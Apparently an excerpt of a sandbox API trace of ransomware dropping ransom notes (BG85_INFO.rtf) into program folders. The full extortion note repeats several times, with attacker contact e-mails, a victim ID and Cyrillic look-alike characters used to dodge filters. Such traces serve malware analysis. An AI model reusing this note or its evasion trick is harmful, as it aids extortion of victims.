s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2662a08, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n÷!&ø~@\x9ee9»Ñ%âÔ^\x1fÍ\nÐqO¢\x12m\x054\x83ØÍ\x12×\x92j6ftR\x8a\x86\x93âf\rr\x9b5ôîéVxR;\x04¨¶/j¤Rü\x8b\x07\x13¦\x88\x88\x1aj\x1b\x8ab\x80U\x12m¡#\x1a\x92è\x16Q2\x9f\x93\x19ToÝ\x87\x96ßé°Óìm!¨rÈô'_\x0e&!ÞÚ\x0cêúó¿\x80\x0ef\x1f¬0(H \x9f\x02\x06Ø»þ8¡\x04ÁkS,{Â*q\x8bïæ\x7fÈ\x04ù°¬ÙvâYÒ`\x9d\x1d\x10´¬\x82W·º Jγ§…Îm\x1cu\x8b\\\x95\x84\x93òï\x91\x0f\x04\x06À`\x1dL\x99\x0f\"ä\x06\x95û\x9f0\x8c\x93G0ÌG\x80Ì\x7fòá½\x9d>\x03l", lpUsedDefaultChar=0x0) returned 7247 [0070.442] WriteFile (in: hFile=0x1e4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0070.443] CloseHandle (hObject=0x1e4) returned 1 [0070.444] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bg85_info.rtf")) returned 0x20 [0070.444] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\bg85_info.rtf")) returned 0xffffffff [0070.444] GetLastError () returned 0x2 [0070.444] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0070.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS 